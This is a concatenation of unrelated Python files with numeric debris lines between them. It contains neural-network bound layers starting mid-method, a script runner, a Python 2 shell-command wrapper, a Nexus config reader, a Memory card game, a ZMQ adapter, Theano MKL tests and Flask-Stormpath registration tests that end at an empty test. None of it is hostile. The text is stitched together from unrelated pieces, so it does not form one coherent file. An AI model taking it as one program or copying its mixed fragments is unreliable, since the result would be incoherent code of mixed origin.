            adjust1 = torch.norm(self.layer.weight.unsqueeze(0) * ori_perturb_eps1.unsqueeze(1), dim = 2, p = dual_norm)  # [batch_size, out_dim]
            adjust2 = torch.norm(self.layer.weight.unsqueeze(0) * ori_perturb_eps2.unsqueeze(1), dim = 2, p = dual_norm)  # [batch_size, out_dim]
        else:
            # BUGFIX: the original assigned only `adjust = 0.`, leaving
            # adjust1/adjust2 undefined and raising NameError whenever
            # first_layer was False.
            adjust1 = adjust2 = 0.
        # Split the weight by sign so each bound pairs l/u correctly.
        W_neg = torch.clamp(self.layer.weight, max = 0.)
        W_pos = torch.clamp(self.layer.weight, min = 0.)
        low_bound = l.matmul(W_pos.t()) + u.matmul(W_neg.t()) - adjust1 + self.layer.bias
        up_bound = l.matmul(W_neg.t()) + u.matmul(W_pos.t()) + adjust2 + self.layer.bias
        return low_bound, up_bound, W_list, m1_list, m2_list
class ReLULayer(Layer):
    """ReLU activation with elementwise interval bound propagation."""

    def __init__(self):
        super(ReLULayer, self).__init__()

    def forward(self, x):
        return F.relu(x, inplace = True)

    def bound(self, l, u, W_list, m1_list, m2_list, ori_perturb_norm = None, ori_perturb_eps = None, first_layer = False):
        """ReLU is monotone, so the bounds map elementwise.

        Note: F.relu(..., inplace=True) mutates l and u in place, matching
        the original implementation.
        (The disabled quadratic-method bound code that used to sit here was
        removed; see the module-header note about dropping the quad path.)
        """
        assert first_layer == False, 'the first layer cannot be ReLU'
        lower = F.relu(l, inplace = True)
        upper = F.relu(u, inplace = True)
        return lower, upper, W_list, m1_list, m2_list
class SigdLayer(Layer):
    """Sigmoid activation with elementwise interval bound propagation."""

    def __init__(self):
        super(SigdLayer, self).__init__()

    def forward(self, x):
        # FIX: F.sigmoid is deprecated; torch.sigmoid is numerically identical.
        return torch.sigmoid(x)

    def bound(self, l, u, W_list, m1_list, m2_list, ori_perturb_norm = None, ori_perturb_eps = None, first_layer = False):
        """Sigmoid is monotone, so the bounds map elementwise.

        (The disabled quadratic-method bound code that used to sit here was
        removed; see the module-header note about dropping the quad path.)
        """
        # BUGFIX: the assert message wrongly said "ReLU".
        assert first_layer == False, 'the first layer cannot be Sigmoid'
        low_bound = torch.sigmoid(l)
        up_bound = torch.sigmoid(u)
        return low_bound, up_bound, W_list, m1_list, m2_list
class TanhLayer(Layer):
    """Tanh activation with elementwise interval bound propagation."""

    def __init__(self):
        super(TanhLayer, self).__init__()

    def forward(self, x):
        return torch.tanh(x)

    def bound(self, l, u, W_list, m1_list, m2_list, ori_perturb_norm = None, ori_perturb_eps = None, first_layer = False):
        """Tanh is monotone, so the bounds map elementwise.

        (The disabled quadratic-method bound code that used to sit here was
        removed; see the module-header note about dropping the quad path.)
        """
        # BUGFIX: the assert message wrongly said "ReLU".
        assert first_layer == False, 'the first layer cannot be Tanh'
        low_bound = torch.tanh(l)
        up_bound = torch.tanh(u)
        return low_bound, up_bound, W_list, m1_list, m2_list
class ArctanLayer(Layer):
    """Arctan activation with elementwise interval bound propagation."""

    def __init__(self):
        super(ArctanLayer, self).__init__()

    def forward(self, x):
        return torch.atan(x)

    def bound(self, l, u, W_list, m1_list, m2_list, ori_perturb_norm = None, ori_perturb_eps = None, first_layer = False):
        """Arctan is monotone, so the bounds map elementwise.

        (The disabled quadratic-method bound code that used to sit here was
        removed; see the module-header note about dropping the quad path.)
        """
        # BUGFIX: the assert message wrongly said "ReLU".
        assert first_layer == False, 'the first layer cannot be Arctan'
        low_bound = torch.atan(l)
        up_bound = torch.atan(u)
        return low_bound, up_bound, W_list, m1_list, m2_list
| 11,116 | 4,245 |
"""
main.py
----------
"""
import argparse
import os
import runpy
import sys
from . import console
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Description",
)
parser.add_argument(
"source",
nargs="?",
help="""Name of the script to be run as though it was the main module
run by Python, so that __name__ does equal '__main__'.
""",
)
def main():
    """Parse arguments, optionally run the given script, then (depending on
    Python's -i flag) hand control to the interactive console."""
    # `exit` is overridden so the console always terminates the process cleanly.
    console_dict = {"exit": lambda: os._exit(1)}
    args = parser.parse_args()
    if args.source is None:
        console.start_console(local_vars=console_dict)
        return
    if not sys.flags.interactive:
        runpy.run_path(args.source, run_name="__main__")
        return
    # Interactive mode: run the script as a module, then expose its globals
    # inside the console namespace.
    module_name = args.source
    if module_name.endswith(".py"):
        module_name = module_name[:-3]
    console_dict.update(runpy.run_module(module_name, run_name="__main__"))
    console.start_console(local_vars=console_dict)
# Module entry point: executed on import as __main__ (e.g. `python -m pkg`).
main()
| 1,050 | 318 |
#python Libraries
from StringIO import StringIO
from collections import namedtuple
import Queue
import os
# Third-party Libraries
try:
import pexpect
except ImportError as error:
#print error
pass
# apetools Libraries
from apetools.baseclass import BaseClass
from apetools.commons.errors import ConnectionError
from apetools.commons.readoutput import StandardOutput
from producer import PopenProducer
# Template used to join a command prefix with a command string.
SPACER = '{0} {1} '
# Prefix some shells emit for an unrecognized command.
UNKNOWN = "Unknown command: "
# pexpect.readline() returns the empty string once the child hits EOF.
EOF = ''
SPACE = " "

# Pair of file-like objects: (standard output, standard error).
OutputError = namedtuple("OutputError", 'output error')
class LocalConnection(BaseClass):
    """
    A connection that executes commands against the local command-line shell.
    """
    def __init__(self, command_prefix='', *args, **kwargs):
        """
        :param:

         - `command_prefix`: A prefix to prepend to commands (e.g. 'adb shell')
        """
        super(LocalConnection, self).__init__(*args, **kwargs)
        # BaseClass owns the logger; re-declared here for child classes.
        self._logger = None
        self.command_prefix = command_prefix
        self._queue = None

    @property
    def queue(self):
        """
        :rtype: Queue.Queue
        :return: the local Queue, created lazily on first access
        """
        if self._queue is None:
            self._queue = Queue.Queue()
        return self._queue

    def _procedure_call(self, command, arguments='',
                        path="", timeout=None):
        """
        Hook for subclasses to customize execution.

        The base implementation just delegates to _main().
        """
        return self._main(command, arguments, path, timeout)

    def _main(self, command, arguments='', path="",
              timeout=None):
        """
        :param:

         - `command`: the command string to execute
         - `arguments`: The arguments for the command
         - `timeout`: if `block`, wait until timeout for output

        :return: OutputError named tuple
        """
        try:
            command = os.path.join(path, command)
            self.logger.debug("Creating PopenProducer")
            producer = PopenProducer(SPACE.join((self.command_prefix, command, arguments)),
                                     timeout=timeout)
            result = OutputError(producer.stdout, producer.stderr)
            self.logger.debug("returning Output Error")
            return result
        except OSError as error:
            self.logger.error(error)
            raise ConnectionError("Unable to execute '{0}'".format(SPACE.join((command, arguments))))

    def __getattr__(self, command):
        """
        Treat any unknown attribute as a shell command to run.

        :param:

         - `command`: The command to call.
        :return: callable forwarding *command* to _procedure_call
        """
        return lambda *args, **kwargs: self._procedure_call(command, *args, **kwargs)
# end class LocalConnection
class LocalNixConnection(LocalConnection):
    """
    A Class that uses Pexpect to get around the problem of file-buffering

    So far as I know, Pexpect only works on *nix-based systems.
    """
    def __init__(self, *args, **kwargs):
        super(LocalNixConnection, self).__init__(*args, **kwargs)
        # re-declared so subclasses can lazily build their own logger
        self._logger = None
        return

    def run(self, command, arguments):
        """
        runs the Pexpect command and puts lines of output on the Queue

        :param:

         - `command`: The shell command.
         - `arguments`: A string of command arguments.

        :postcondition: OutputError with output and error file-like objects
        """
        # Prepend the prefix (e.g. 'adb shell') only when one was configured.
        if len(self.command_prefix):
            command = SPACER.format(self.command_prefix,
                                    command)
        child = pexpect.spawn(SPACER.format(command, arguments), timeout=None)
        line = None
        output_queue = Queue.Queue()
        output = StandardOutput(queue=output_queue)
        # pexpect interleaves stderr with stdout, so error is a dummy stream.
        error = StringIO('')
        self.queue.put(OutputError(output, error))
        # Pump child output line-by-line until EOF ('') is read.
        while line != EOF:
            try:
                line = child.readline()
                output_queue.put(line)
            except pexpect.TIMEOUT:
                # NOTE(review): on timeout the previous line is re-queued;
                # presumably readline() eventually returns EOF — confirm.
                self.logger.debug("pexpect.readline() timed out")
                output_queue.put(line)
# end class LocalNixConnection
if __name__ == "__main__":
    # Smoke test: run a few shell commands through a LocalConnection and
    # dump their output. (Python 2 print statements — this module is Py2.)
    arguments = "-l"
    lc = LocalConnection()
    output = lc.ls(arguments='-l')
    print output.output.read()
    # A bounded ping so iteration over stdout terminates.
    output = lc.ping(arguments="-c 10 192.168.0.1", timeout=1)
    for x in output.output:
        print x
    print output.error.read()
    output = lc.iperf('-i 1 -c localhost')
    print output.output.read()
    #lc = LocalNixConnection()
    output = lc.iperf('-h')
    print output.error.read()
    #for line in output.output:
    #    print line
    print output.output.read()
| 4,779 | 1,337 |
import os
import logging
import xml.etree.ElementTree as ET
from . import Security, Ldap
class Nexus:
    """In-memory model of a Nexus server instance's configuration.

    ``refresh()`` parses ``conf/nexus.xml`` (plus ``conf/capabilities.xml``
    for Yum support) into repository descriptor dicts and drives the
    ``Ldap`` and ``Security`` helpers.  Methods follow the original
    convention of returning ``True`` on success or a user-facing error
    string on failure.
    """

    def __init__(self):
        self.log = logging.getLogger(__name__)
        self.path = None      # absolute path of the loaded instance, or None
        self.repos = None     # list of repository descriptor dicts
        self.repomap = None   # repository id -> descriptor dict
        self.dirty = True
        self.ldap = Ldap()
        self.security = Security()

    def refresh(self, path):
        """(Re)load all configuration from the Nexus instance at *path*.

        :param path: instance root directory, or None to just reset state
        :return: True on success, otherwise an error message string
        """
        repos, repomap = [], {}
        # Reset to the unloaded state first so a failed refresh never
        # leaves stale data behind.
        self.path = None
        self.repos = None
        self.repomap = None
        self.dirty = True
        self.ldap.initialize()
        self.security.initialize()
        if path is None:
            return True
        path = os.path.abspath(path)
        caps = self.getYumCapabilities(path)
        config = os.path.join(path, 'conf', 'nexus.xml')
        self.log.info("Reading Nexus config from %s.", config)
        if not os.path.isfile(config):
            self.log.error("Nexus config file does not exist.")
            return "Given path is not a valid Nexus instance."
        try:
            xml = ET.parse(config).getroot()
            self.security.gettargets(xml)
            for repo in xml.find('repositories').findall('repository'):
                repodata = {}
                repodata['id'] = repo.find('id').text
                repodata['desc'] = repo.find('name').text
                typ, layout = self.getPackType(caps, repo)
                repodata['type'] = typ
                repodata['layout'] = layout
                self.getRepoClass(repo, repodata)
                # Release/snapshot policy lives in the repository's
                # external configuration, when present.
                ext = repo.find('externalConfiguration')
                policy = None
                if ext is not None:
                    policy = ext.find('repositoryPolicy')
                repodata['release'] = False
                repodata['snapshot'] = False
                if policy is not None:
                    repodata['release'] = policy.text in ('RELEASE', 'MIXED')
                    repodata['snapshot'] = policy.text in ('SNAPSHOT', 'MIXED')
                repos.append(repodata)
                repomap[repodata['id']] = repodata
            self.log.info("Successfully read Nexus config.")
        except Exception:
            # Narrowed from a bare "except:" so KeyboardInterrupt/SystemExit
            # are no longer swallowed; parse errors are logged with traceback.
            self.log.exception("Error reading Nexus config:")
            return "Configuration file nexus.xml is not valid."
        repos.sort(key=lambda x: x['class'])
        self.ldap.refresh(path)
        secrtn = self.security.refresh(path)
        if secrtn != True:
            return secrtn
        self.repos = repos
        self.repomap = repomap
        self.path = path
        return True

    def getRepoClass(self, repo, repodata):
        """Classify *repo* as virtual/remote/shadow/local.

        Records the class plus, where applicable, the member repository
        list, the remote URL, and the local storage URL in *repodata*.
        """
        ext = repo.find('externalConfiguration')
        members, master = None, None
        if ext is not None:
            members = ext.find('memberRepositories')
            master = ext.find('masterRepositoryId')
        remote = repo.find('remoteStorage')
        local = repo.find('localStorage')
        if local is not None:
            localurl = local.find('url')
            if localurl is not None:
                lurl = localurl.text
                # Normalize to a trailing slash for later path joining.
                if lurl[-1] != '/':
                    lurl += '/'
                repodata['localurl'] = lurl
        if members is not None:
            repodata['class'] = 'virtual'
            repodata['repos'] = [child.text for child in members.findall('memberRepository')]
        elif remote is not None:
            repodata['class'] = 'remote'
            repodata['remote'] = remote.find('url').text
        elif master is not None:
            repodata['class'] = 'shadow'
        else:
            repodata['class'] = 'local'

    def getPackType(self, caps, repo):
        """Map a repository's provider hint to a (type, layout) pair.

        :param caps: ids of repositories that carry a Yum capability
        :param repo: a <repository> element
        :return: (package type, layout name ending in '-default')
        """
        if repo.find('id').text in caps:
            return 'yum', 'simple-default'
        rtypes = ['maven1', 'maven2', 'npm', 'nuget', 'gems']
        ltypes = ['bower', 'gradle', 'ivy', 'npm', 'nuget', 'sbt', 'vcs']
        # Guard against a missing <providerHint> element as well as empty
        # text (the original dereferenced .text unconditionally and raised
        # AttributeError when the element was absent).
        hintelem = repo.find('providerHint')
        hint = hintelem.text if hintelem is not None else None
        if hint is None:
            return 'generic', 'simple-default'
        # Strip a trailing role suffix such as "maven2-hosted".
        subs = hint[hint.rfind('-'):]
        if subs in ('-shadow', '-hosted', '-proxy', '-group'):
            hint = hint[:hint.rfind('-')]
        # Normalize converter/alias hints to canonical type names.
        if hint == 'm2-m1':
            hint = 'maven1'
        elif hint == 'm1-m2':
            hint = 'maven2'
        elif hint == 'rubygems':
            hint = 'gems'
        if hint not in rtypes:
            hint = 'generic'
        layout = 'simple'
        if hint in ltypes:
            layout = hint
        elif hint == 'maven1':
            hint, layout = 'maven', 'maven-1'
        elif hint == 'maven2':
            hint, layout = 'maven', 'maven-2'
        return hint, layout + '-default'

    def getYumCapabilities(self, path):
        """Return ids of repositories with a Yum capability configured.

        Reads ``conf/capabilities.xml``; a missing file means no Yum repos.
        """
        xml = os.path.join(path, 'conf', 'capabilities.xml')
        if not os.path.isfile(xml):
            return []
        yumrepos = []
        root = ET.parse(xml).getroot()
        for cap in root.find('capabilities').findall('capability'):
            tid = cap.find('typeId').text
            # TODO add 'yum.merge' to this list when Artifactory starts
            # supporting virtual Yum repositories
            if tid not in ('yum.generate', 'yum.proxy'):
                continue
            props = {}
            for prop in cap.find('properties').findall('property'):
                props[prop.find('key').text] = prop.find('value').text
            yumrepos.append(props['repository'])
        return yumrepos
| 5,167 | 1,497 |
# implementation of card game - Memory
import simplegui
import random
# for repeatition check
# helper function to initialize globals
def new_game():
    """Shuffle a fresh 16-card deck (8 pairs) and reset all game state."""
    # Two copies of 0..7 form the eight pairs.
    # NOTE(review): random.shuffle needs a list, so range() must return a
    # list — this is Python 2 / CodeSkulptor code.
    cards1 = range(0,8)
    cards2 = range(0,8)
    random.shuffle(cards1)
    random.shuffle(cards2)
    global cardDeck
    cardDeck = cards1 + cards2
    random.shuffle(cardDeck)
    global exposed
    # exposed[i] is True while card i is face up.
    exposed = [False] * 16
    global turns, count
    # turns holds the deck indices flipped this round; -1 means "none yet".
    turns = [-1] * 2
    count = 0
    label.set_text("Turns = " + str(count))
# define event handlers
def mouseclick(pos):
    """Flip the clicked card and advance the three-state match logic."""
    # add game state logic here
    # NOTE(review): pos[0] / 50 maps the x pixel to a card index and relies
    # on Python 2 integer division (use // under Python 3).
    global turns, count
    # if its 1st Turn just flip (state 0)
    if turns[0] == -1 and exposed[pos[0] / 50] == False:
        turns[0] = pos[0] / 50
        exposed[turns[0]] = True
    # if its 2nd Turn (state 1)
    elif turns[1] == -1 and exposed[pos[0] / 50] == False:
        turns[1] = pos[0] / 50
        exposed[turns[1]] = True
        # increase overall count of turns after end of both turns
        count += 1
        label.set_text("Turns = " + str(count))
        # All cards face up means the game has been won.
        if False not in exposed:
            label.set_text("Won the Game in " + str(count) + " Turns, Press Reset for New Game!" )
    # if its 1st Turn (state 2)
    elif turns[1] != -1 and exposed[pos[0] / 50] == False:
        # if cards doesn't pair flip back both
        if cardDeck[turns[0]] != cardDeck[turns[1]]:
            exposed[turns[1]] = False
            exposed[turns[0]] = False
            turns[1] = -1
            turns[0] = pos[0] / 50
            exposed[turns[0]] = True
        else:
            # Matched pair stays exposed; start a fresh round with this card.
            turns[1] = -1
            turns[0] = pos[0] / 50
            exposed[turns[0]] = True
# cards are logically 50x100 pixels in size
def draw(canvas):
    """Draw all 16 cards; exposed ones show their number on white."""
    for index, card in enumerate(cardDeck):
        if exposed[index] == True:
            # Face-up: white card with its value drawn in red.
            canvas.draw_polygon([(index*50, 0), ((index*50) + 50, 0), ((index*50) + 50, 100), (index*50 , 100)], 1, 'Black', 'White')
            canvas.draw_text(str(card), ((index*50) + 10, 70), 65, 'Red')
        else:
            # Face-down: plain green back.
            canvas.draw_polygon([(index*50, 0), ((index*50) + 50, 0), ((index*50) + 50, 100), (index*50 , 100)], 1, 'Black', 'Green')
# create frame and add a button and labels
# (canvas is 800x100: 16 cards at 50x100 pixels each)
frame = simplegui.create_frame("Memory", 800, 100)
frame.add_button("Reset", new_game)
label = frame.add_label("Turns = 0")

# register event handlers
frame.set_mouseclick_handler(mouseclick)
frame.set_draw_handler(draw)

# get things rolling
new_game()
frame.start()
| 2,523 | 917 |
'''
Created on Mar 22, 2018
@author: msanchez
'''
# Standard library
import html
import urllib
import urllib.request
from html.parser import HTMLParser

# Third-party
import requests
class WebUtilities(object):

    def __init__(self):
        ''' Utility class. Has everything that has to do with web download / requests.
            It may also create static HTML web pages.

        Attributes:
            content  Part of the page which will form the main content, this is the main info to show.
            title    title which will be shown into HTML <h1> tags as main header.
        '''
        self.content = ""

    def download(self, url):
        ''' Obtains complete request from an URL.

        :param url: Complete url to download
        :return: Complete request
        :rtype: requests.Response
        '''
        page = requests.get(url)
        # NOTE: stores the unescaped *text* (a str) back into the response's
        # private _content attribute, preserving the original design.
        page._content = self.__unescape(page)
        return page

    def web_status(self, url):
        ''' Pings a web and shows if it's reachable.

        :return: online if status code == 200, else offline
        :rtype: str
        '''
        # Requires "import urllib.request" at module level — a bare
        # "import urllib" does not bind the request submodule.
        status_code = urllib.request.urlopen(url).getcode()
        return "online" if status_code == 200 else "offline" # todo: change to bool

    def __unescape(self, page):
        ''' Removes HTML Entities. If not done, chars such as 'á' would appear as 'x/0f1' when read.
        '''
        # HTMLParser.unescape() was deprecated and removed in Python 3.9;
        # html.unescape() is the supported replacement.
        return html.unescape(page.text)

    def create_static_web(self, title):
        ''' Sets the title which will be shown to the given str and creates and empty content

        :param title: str to set as the web's title
        '''
        self.content = ""
        self.title = title

    def append_paragraph(self, content):
        ''' Appends the given parameter as a part of the main content to be shown.
            it does so appending it into <p> tags.

        :param content: str to be added in a new line into <p> tags
        '''
        self.content += "<p>" + content + "</p>"

    def build(self):
        ''' Main method to call when the rest of options are set. It will mount the title with the content
            and return the whole web as a str.

        :return: whole static web with appended title and content.
        :rtype: str
        '''
        # content is a single str, so concatenate it directly (the original
        # looped over it character by character to the same effect).
        return "<html><h1>" + self.title + "</h1>" + self.content + "</html>"
import abc
import logging
from typing import List, Optional
from asyncio import Queue
import zmq.asyncio
from zmq.error import ZMQBaseError
from schematics import Model
from schematics.types import StringType, IntType, ListType
class BaseSheep(metaclass=abc.ABCMeta):
    """
    A base class for container adapters - classes that allow launching different kinds of containers.
    """

    class Config(Model):
        # Declarative (schematics) schema of a sheep's configuration entry.
        type: str = StringType(required=True)  # adapter type identifier
        port: int = IntType(required=True)  # TCP port of the sheep's runner
        devices: List[str] = ListType(StringType, default=lambda: [])  # device names assigned to this sheep

    _config: Config

    def __init__(self, socket: zmq.asyncio.Socket, sheep_data_root: str):
        """
        Create new :py:class:`BaseSheep`.

        :param socket: socket for feeding sheep's runner with InputMessages
        :param sheep_data_root: sheep data root with job working directories
        """
        self._config: Optional[self.Config] = None
        self.socket: zmq.asyncio.Socket = socket
        self.jobs_queue: Queue = Queue()  # queue of jobs to be processed
        self.model_name: Optional[str] = None  # current model name
        self.model_version: Optional[str] = None  # current model version
        self.sheep_data_root: Optional[str] = sheep_data_root
        self.in_progress: set = set()  # set of job_ids which are currently sent for processing to the sheep's runner

    def _load_model(self, model_name: str, model_version: str) -> None:
        """Tell the sheep to prepare a new model (without restarting)."""
        self.model_name = model_name
        self.model_version = model_version

    def start(self, model_name: str, model_version: str) -> None:
        """
        (Re)start the sheep with the given model name and version.

        Any unfinished jobs will be lost, socket connection will be reset.

        :param model_name: model name
        :param model_version: model version
        """
        if self.running:
            self.slaughter()
        self._load_model(model_name, model_version)
        # Forget anything that was in flight before the restart.
        self.in_progress = set()
        # NOTE(review): assumes the runner listens on this host at the
        # configured port — confirm against the runner launch code.
        self.socket.connect("tcp://0.0.0.0:{}".format(self._config.port))

    def slaughter(self) -> None:
        """Disconnect from the sheep runner's socket (best effort)."""
        zmq_address = 'tcp://0.0.0.0:{}'.format(self._config.port)
        try:
            self.socket.disconnect(zmq_address)
        except ZMQBaseError:
            # Disconnecting a never-connected socket raises; treat as benign.
            logging.warning('Failed to disconnect socket (perhaps it was not started/connected)')

    @property
    @abc.abstractmethod
    def running(self) -> bool:
        """Is the sheep running, i.e. capable of accepting computation requests?"""
class MetaVarList(list):
    """A list that delegates format() rendering to a formatter object.

    The formatter is stored per instance.  (The original assigned
    ``cls._formatter`` inside ``__new__``, i.e. a CLASS attribute, so every
    instance silently shared whichever formatter was passed last.)
    """

    def __new__(cls, data=None, formatter=None):
        # list.__init__ (invoked by type.__call__ with the original
        # arguments) fills in *data*; here we only attach the formatter.
        obj = super(MetaVarList, cls).__new__(cls, data)
        obj._formatter = formatter
        return obj

    def __str__(self):
        return 'myList(%s)' % list(self)

    def __format__(self, spec):
        print(spec)
        # flag = 'rnd_if_gt_'
        # The spec string (e.g. 'comma' or 'list') selects the renderer.
        return self._formatter.format(spec, list(self))

    def __add__(self, other):
        # Concatenation keeps the left operand's formatter.
        return MetaVarList(list(self) + list(other), formatter=self._formatter)
class MetaVarFormatter():
    """Maps a format-spec name to a rendering function for a list of values."""

    def __init__(self):
        # Registry of spec name -> renderer; unknown specs fall back to the
        # comma-separated renderer inside format().
        self.formats = {}
        self.formats['comma'] = self._format_list
        self.formats['list'] = self._format_md_list

    def _format_list(self, values):
        """Render the values as one comma-separated line."""
        return ', '.join(values)

    def _format_md_list(self, values):
        """Render the values as a markdown-style bullet list."""
        return ''.join("- {} \n".format(item) for item in values)

    def format(self, type, values):
        """Dispatch *values* to the renderer registered for *type*."""
        renderer = self.formats.get(type, self._format_list)
        return renderer(values)
class SafeDict(dict):
    """dict for str.format_map that leaves unknown placeholders intact.

    A missing key renders back as '{key}' instead of raising KeyError.
    """

    def __missing__(self, key):
        # Re-wrap the key in braces so the placeholder survives formatting.
        return ''.join(('{', key, '}'))
def do_format(result):
    """Print *result* rendered through str.format_map.

    The ':list' and ':comma' specs reach each MetaVarList.__format__,
    which delegates to that instance's formatter.
    """
    # NOTE(review): the literal's internal whitespace is significant output.
    print('''a_value:
{a:list}
b_value: {b:comma}
'''.format_map(result))
# Demo: merge a list of dicts into a SafeDict of MetaVarLists, then format.
a = [{'a':'5'}, {'a':'6'}]
final = SafeDict({})
formatter = MetaVarFormatter()
for D in a:
    for key, value in D.items(): # in python 2 use D.iteritems() instead
        # Accumulate each key's values into one MetaVarList per key.
        final[key] = final.get(key,MetaVarList(formatter=formatter)) + MetaVarList([value], formatter=formatter)
print(final['a'])
do_format(final)
import theano
import unittest
import numpy
from nose.plugins.skip import SkipTest
from theano import tensor as T
from theano.tensor.nnet import conv2d
from theano.sandbox import mkl
# Fixed seed so any random data used by the tests is reproducible.
numpy.random.seed(123)

# These tests only make sense when the optional MKL backend was built in.
if not mkl.mkl_available:
    raise SkipTest('Optional package MKL disabled')

# Build two compilation modes from the same base: one with the MKL graph
# optimizations enabled and one with them excluded, for comparison.
if theano.config.mode == 'FAST_COMPILE':
    mode_with_mkl = theano.compile.mode.get_mode('FAST_RUN').including('mkl')
    mode_without_mkl = theano.compile.mode.get_mode('FAST_RUN').excluding('mkl')
else:
    mode_with_mkl = theano.compile.mode.get_default_mode().including('mkl')
    mode_without_mkl = theano.compile.mode.get_default_mode().excluding('mkl')
class test_mkl_conv_forward(unittest.TestCase):
    """Build conv2d forward graphs and dump them (as .png via pydotprint)
    before and after the MKL optimization passes, for visual comparison."""

    def test_conv_no_bias(self):
        # Symbolic inputs; fixed shapes let the MKL optimizer specialize.
        images = T.ftensor4('inputs')
        weights = T.ftensor4('weights')
        convOut = conv2d(images, weights, input_shape=(12, 3, 256, 256), filter_shape=(12, 3, 3, 3), filter_flip=False)
        theano.printing.pydotprint(convOut, outfile="Conv_before_opt.png", var_with_name_simple=True)
        # Compile with and without MKL and dump both optimized graphs.
        fopt = theano.function(inputs=[images, weights], outputs=convOut, mode=mode_with_mkl)
        theano.printing.pydotprint(fopt, outfile="Conv_OPT_after_opt.png", var_with_name_simple=True)
        fori = theano.function(inputs=[images, weights], outputs=convOut, mode=mode_without_mkl)
        theano.printing.pydotprint(fori, outfile="Conv_Original_after_opt.png", var_with_name_simple=True)

    def test_conv_with_bias(self):
        images = T.ftensor4('inputs')
        weights = T.ftensor4('weights')
        bias = T.vector('bias')
        convOut = conv2d(images, weights, input_shape=(12, 3, 256, 256), filter_shape=(12, 3, 3, 3), filter_flip=False)
        # Broadcast the bias over batch and spatial dimensions.
        convOutBias = convOut + bias.dimshuffle('x', 0, 'x', 'x')
        theano.printing.pydotprint(convOutBias, outfile="ConvBias_before_opt.png", var_with_name_simple=True)
        fopt = theano.function(inputs=[images, weights, bias], outputs=convOutBias, mode=mode_with_mkl)
        theano.printing.pydotprint(fopt, outfile="ConvBias_OPT_after_opt.png", var_with_name_simple=True)
        fori = theano.function(inputs=[images, weights, bias], outputs=convOutBias, mode=mode_without_mkl)
        theano.printing.pydotprint(fori, outfile="ConvBias_Original_after_opt.png", var_with_name_simple=True)
class test_mkl_conv_backward(unittest.TestCase):
    """Same as the forward tests, but the dumped graphs contain the
    gradients of the convolution w.r.t. its inputs (and bias)."""

    def test_conv_no_bias(self):
        images = T.ftensor4('input_conv')
        weights = T.ftensor4('weights')
        convOut = conv2d(images, weights, input_shape=(12, 3, 256, 256), filter_shape=(12, 3, 3, 3), filter_flip=False)
        # Reduce to a scalar so T.grad can differentiate.
        convOutSum = T.sum(convOut)
        conv_op_di = T.grad(convOutSum, images)
        conv_op_dk = T.grad(convOutSum, weights)
        convOutBack = [conv_op_di, conv_op_dk]
        theano.printing.pydotprint(convOutBack, outfile="ConvBack_before_opt.png", var_with_name_simple=True)
        fopt = theano.function(inputs=[images, weights], outputs=convOutBack, mode=mode_with_mkl)
        theano.printing.pydotprint(fopt, outfile="ConvBack_OPT_after_opt.png", var_with_name_simple=True)
        fori = theano.function(inputs=[images, weights], outputs=convOutBack, mode=mode_without_mkl)
        theano.printing.pydotprint(fori, outfile="ConvBack_Original_after_opt.png", var_with_name_simple=True)

    def test_conv_with_bias(self):
        images = T.ftensor4('input_conv')
        weights = T.ftensor4('weights')
        bias = T.vector('bias')
        convOut = conv2d(images, weights, input_shape=(12, 3, 256, 256), filter_shape=(12, 3, 3, 3), filter_flip=False)
        # Scalar loss over conv output plus broadcast bias.
        convOutSum = T.sum(convOut + bias.dimshuffle('x', 0, 'x', 'x'))
        conv_op_di = theano.grad(convOutSum, images)
        conv_op_dk = theano.grad(convOutSum, weights)
        conv_op_db = theano.grad(convOutSum, bias)
        convOutBack = [conv_op_di, conv_op_dk, conv_op_db]
        theano.printing.pydotprint(convOutBack, outfile="ConvBiasBack_before_opt.png", var_with_name_simple=True)
        fopt = theano.function(inputs=[images, weights, bias], outputs=convOutBack, mode=mode_with_mkl)
        theano.printing.pydotprint(fopt, outfile="ConvBiasBack_OPT_after_opt.png", var_with_name_simple=True)
        fori = theano.function(inputs=[images, weights, bias], outputs=convOutBack, mode=mode_without_mkl)
        theano.printing.pydotprint(fori, outfile="ConvBiasBack_Original_after_opt.png", var_with_name_simple=True)
if __name__ == '__main__':
unittest.main()
| 4,462 | 1,665 |
"""Run tests against our custom views."""
from flask.ext.stormpath.models import User
from .helpers import StormpathTestCase
class TestRegister(StormpathTestCase):
    """Test our registration view.

    Throughout these tests: a 200 response means the form was re-rendered
    with validation errors, a 302 means the registration succeeded and the
    client was redirected.
    """

    def test_default_fields(self):
        """The default field set is required for a successful registration."""
        # By default, we'll register new users with first name, last name,
        # email, and password.
        with self.app.test_client() as c:
            # Ensure that missing fields will cause a failure.
            resp = c.post('/register', data={
                'email': 'r@rdegges.com',
                'password': 'woot1LoveCookies!',
            })
            self.assertEqual(resp.status_code, 200)

            # Ensure that valid fields will result in a success.
            resp = c.post('/register', data={
                'username': 'rdegges',
                'given_name': 'Randall',
                'middle_name': 'Clark',
                'surname': 'Degges',
                'email': 'r@rdegges.com',
                'password': 'woot1LoveCookies!',
            })
            self.assertEqual(resp.status_code, 302)

    def test_disable_all_except_mandatory(self):
        """Only email and password are needed when extras are disabled."""
        # Here we'll disable all the fields except for the mandatory fields:
        # email and password.
        self.app.config['STORMPATH_ENABLE_USERNAME'] = False
        self.app.config['STORMPATH_ENABLE_GIVEN_NAME'] = False
        self.app.config['STORMPATH_ENABLE_MIDDLE_NAME'] = False
        self.app.config['STORMPATH_ENABLE_SURNAME'] = False

        with self.app.test_client() as c:
            # Ensure that missing fields will cause a failure.
            resp = c.post('/register', data={
                'email': 'r@rdegges.com',
            })
            self.assertEqual(resp.status_code, 200)

            # Ensure that valid fields will result in a success.
            resp = c.post('/register', data={
                'email': 'r@rdegges.com',
                'password': 'woot1LoveCookies!',
            })
            self.assertEqual(resp.status_code, 302)

    def test_require_settings(self):
        """Optional name fields fall back to 'Anonymous' when not required."""
        # Here we'll change our backend behavior such that users *can* enter a
        # first and last name, but they aren't required server side.
        # email and password.
        self.app.config['STORMPATH_REQUIRE_GIVEN_NAME'] = False
        self.app.config['STORMPATH_REQUIRE_SURNAME'] = False

        with self.app.test_client() as c:
            # Ensure that registration works *without* given name and surname
            # since they aren't required.
            resp = c.post('/register', data={
                'email': 'r@rdegges.com',
                'password': 'woot1LoveCookies!',
            })
            self.assertEqual(resp.status_code, 302)

            # Find our user account that was just created, and ensure the given
            # name and surname fields were set to our default string.
            user = User.from_login('r@rdegges.com', 'woot1LoveCookies!')
            self.assertEqual(user.given_name, 'Anonymous')
            self.assertEqual(user.surname, 'Anonymous')

    def test_error_messages(self):
        """Password-policy violations surface as user-facing messages only."""
